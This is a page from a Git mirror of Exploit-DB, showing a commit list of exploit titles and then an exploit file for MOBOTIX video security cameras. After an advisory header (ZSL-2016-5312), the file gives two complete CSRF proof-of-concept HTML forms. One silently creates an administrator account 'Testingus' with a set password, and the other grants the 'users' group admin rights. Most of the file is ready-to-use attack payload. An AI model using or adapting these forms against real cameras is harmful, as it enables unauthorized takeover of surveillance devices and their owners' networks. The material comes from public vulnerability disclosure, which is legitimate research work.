bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/hardware/webapps/39641.html
Offensive Security 5de0917681 DB: 2016-04-01 
4 new exploits

Apache 1.3.x mod_mylo Remote Code Execution Exploit
Apache 1.3.x mod_mylo - Remote Code Execution Exploit

Apache <= 1.3.31 mod_include Local Buffer Overflow Exploit
Apache <= 1.3.31 mod_include - Local Buffer Overflow Exploit

Sire 2.0 (lire.php) Remote File Inclusion/Arbitary File Upload Vulnerability
Sire 2.0 (lire.php) - Remote File Inclusion/Arbitrary File Upload Vulnerability

HP Digital Imaging (hpqxml.dll 2.0.0.133) Arbitary Data Write Exploit
HP Digital Imaging (hpqxml.dll 2.0.0.133) - Arbitrary Data Write Exploit

SecureBlackbox (PGPBBox.dll 5.1.0.112) Arbitary Data Write Exploit
SecureBlackbox (PGPBBox.dll 5.1.0.112) - Arbitrary Data Write Exploit

Kwalbum <= 2.0.2 Arbitary File Upload Vulnerability
Kwalbum <= 2.0.2 - Arbitrary File Upload Vulnerability

ZaoCMS (PhpCommander) Arbitary Remote File Upload Vulnerability
ZaoCMS (PhpCommander) - Arbitrary Remote File Upload Vulnerability

CMS Balitbang 3.3 Arbitary File Upload Vulnerability
CMS Balitbang 3.3 - Arbitrary File Upload Vulnerability

CMS Lokomedia 1.5 Arbitary File Upload Vulnerability
CMS Lokomedia 1.5 - Arbitrary File Upload Vulnerability

Apache 1.3.12 WebDAV Directory Listings Vulnerability
Apache 1.3.12 - WebDAV Directory Listings Vulnerability

Apache 1.3 Web Server with Php 3 File Disclosure Vulnerability
Apache 1.3 Web Server with PHP 3 - File Disclosure Vulnerability

NCSA 1.3/1.4.x/1.5_Apache httpd 0.8.11/0.8.14 ScriptAlias Source Retrieval Vulnerability
NCSA 1.3/1.4.x/1.5_ Apache httpd 0.8.11/0.8.14 - ScriptAlias Source Retrieval Vulnerability
Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (1)
Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (2)
Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (3)
Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (4)
Apache 1.3 - Artificially Long Slash Path Directory Listing Vulnerability (1)
Apache 1.3 - Artificially Long Slash Path Directory Listing Vulnerability (2)
Apache 1.3 - Artificially Long Slash Path Directory Listing Vulnerability (3)
Apache 1.3 - Artificially Long Slash Path Directory Listing Vulnerability (4)

Shareplex 2.1.3.9/2.2.2 beta - Arbitary Local File Disclosure Vulnerability
Shareplex 2.1.3.9/2.2.2 beta - Arbitrary Local File Disclosure Vulnerability

Apache 1.3 Possible Directory Index Disclosure Vulnerability
Apache 1.3 - Possible Directory Index Disclosure Vulnerability

Apache 1.0/1.2/1.3 Server Address Disclosure Vulnerability
Apache 1.0/1.2/1.3 - Server Address Disclosure Vulnerability

Apache 1.3/2.0.x Server Side Include Cross-Site Scripting Vulnerability
Apache 1.3/2.0.x - Server Side Include Cross-Site Scripting Vulnerability

sendmail 8.11.6 Address Prescan Memory Corruption Vulnerability
SendMail 8.11.6 - Address Prescan Memory Corruption Vulnerability

Apache 1.3.x mod_include Local Buffer Overflow Vulnerability
Apache 1.3.x mod_include - Local Buffer Overflow Vulnerability
Apache 1.3.x HTDigest Realm Command Line Argument Buffer Overflow Vulnerability (1)
Apache 1.3.x HTDigest Realm Command Line Argument Buffer Overflow Vulnerability (2)
Apache 1.3.x - HTDigest Realm Command Line Argument Buffer Overflow Vulnerability (1)
Apache 1.3.x - HTDigest Realm Command Line Argument Buffer Overflow Vulnerability (2)

PodHawk 1.85 - Arbitary File Upload Vulnerability
PodHawk 1.85 - Arbitrary File Upload Vulnerability

LibrettoCMS File Manager Arbitary File Upload Vulnerability
LibrettoCMS File Manager - Arbitrary File Upload Vulnerability

DotNetNuke DNNspot Store 3.0.0 Arbitary File Upload
DotNetNuke DNNspot Store 3.0.0 - Arbitrary File Upload

Axway Secure Transport 5.1 SP2 - Arbitary File Upload via CSRF
Axway Secure Transport 5.1 SP2 - Arbitrary File Upload via CSRF

Apache Spark Cluster 1.3.x - Arbitary Code Execution
Apache Spark Cluster 1.3.x - Arbitrary Code Execution

Elastix 'graph.php' Local File Include Vulnerability
Elastix 2.2.0 - 'graph.php' Local File Include Vulnerability
MOBOTIX Video Security Cameras - CSRF Add Admin Exploit
Apache OpenMeetings 1.9.x - 3.1.0 - ZIP File path Traversal
Apache Jetspeed Arbitrary File Upload
Wireshark - dissect_pktc_rekey Heap-based Out-of-Bounds Read
2016-04-01 05:03:13 +00:00

96 lines
4.4 KiB
HTML
Executable file
Raw Blame History

<!--
MOBOTIX Video Security Cameras CSRF Add Admin Exploit
Vendor: MOBOTIX AG
Product web page: https://www.mobotix.com
Affected version: [Model]: D22M-Secure, [HW]: T2r1.1.AA, 520 MHz, 128 MByte RAM, [SW]: MX-V3.5.2.23.r3
[Model]: Q24M-Secure, [HW]: T2r3.1, 806 MHz, [SW]: MX-V4.1.10.28
[Model]: D14D-Secure, [HW]: T2r4.2b, 806 MHz, 256 MByte RAM, [SW]: MX-V4.1.4.70
[Model]: M15D-Secure, [HW]: T3r4.4, 806 MHz, [SW]: MX-V4.3.4.50
Summary: MOBOTIX is a German System Manufacturer of Professional Video
Management (VMS) and Smart IP Cameras. These cameras support all standard
features of MOBOTIX IP cameras like automatic object detection, messaging
via network and onboard or network recording. The dual lens thermal system
supports additionally a second optical video sensor with 6-megapixel resolution.
Desc: The application interface allows users to perform certain actions via
HTTP requests without performing any validity checks to verify the requests.
This can be exploited to perform certain actions with administrative privileges
if a logged-in user visits a malicious web site.
Tested on: Linux 2.6.37.6+
thttpd/2.19-MX
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5312
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5312.php
25.02.2016
-->
Add admin user Testingus:
-------------------------
<html>
<body>
<form action="http://10.0.0.17/admin/access" method="POST">
<input type="hidden" name="user&#95;name&#95;0" value="admin" />
<input type="hidden" name="user&#95;group&#95;0" value="admins" />
<input type="hidden" name="user&#95;passwd&#95;a&#95;0" value="&#42;&#42;&#42;" />
<input type="hidden" name="user&#95;passwd&#95;b&#95;0" value="&#42;&#42;&#42;" />
<input type="hidden" name="user&#95;name&#95;2" value="Testingus" />
<input type="hidden" name="user&#95;group&#95;1" value="admins" />
<input type="hidden" name="user&#95;passwd&#95;a&#95;2" value="l33tp4ss" />
<input type="hidden" name="user&#95;passwd&#95;b&#95;2" value="l33tp4ss" />
<input type="hidden" name="sv&#95;passwd&#95;a" value="" />
<input type="hidden" name="sv&#95;passwd&#95;b" value="" />
<input type="hidden" name="super&#95;pin&#95;1" value="" />
<input type="hidden" name="super&#95;pin&#95;2" value="" />
<input type="hidden" name="save&#95;config" value="Set" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
Add group 'users' to admin area:
--------------------------------
<html>
<body>
<form action="http://10.0.0.17/admin/acl" method="POST">
<input type="hidden" name="group&#95;allow&#95;guest&#95;global" value="on" />
<input type="hidden" name="group&#95;allow&#95;live&#95;global" value="on" />
<input type="hidden" name="group&#95;allow&#95;player&#95;global" value="on" />
<input type="hidden" name="group&#95;allow&#95;multiview&#95;global" value="on" />
<input type="hidden" name="group&#95;allow&#95;pda&#95;global" value="on" />
<input type="hidden" name="group&#95;allow&#95;mxcc&#95;global" value="on" />
<input type="hidden" name="group&#95;allow&#95;info&#95;global" value="on" />
<input type="hidden" name="group&#95;allow&#95;imagelink&#95;global" value="on" />
<input type="hidden" name="group&#95;allow&#95;api&#95;global" value="on" />
<input type="hidden" name="group&#95;allow&#95;image&#95;setup&#95;0" value="on" />
<input type="hidden" name="group&#95;allow&#95;event&#95;setup&#95;0" value="on" />
<input type="hidden" name="group&#95;name&#95;1" value="guests" />
<input type="hidden" name="group&#95;name&#95;2" value="users" />
<input type="hidden" name="group&#95;allow&#95;admin&#95;2" value="on" />
<input type="hidden" name="group&#95;allow&#95;image&#95;setup&#95;2" value="on" />
<input type="hidden" name="group&#95;allow&#95;event&#95;setup&#95;2" value="on" />
<input type="hidden" name="new&#95;group" value="" />
<input type="hidden" name="save&#95;config" value="Set" />
<input type="hidden" name="more&#95;or&#95;less" value="less" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
Reference in a new issue View git blame Copy permalink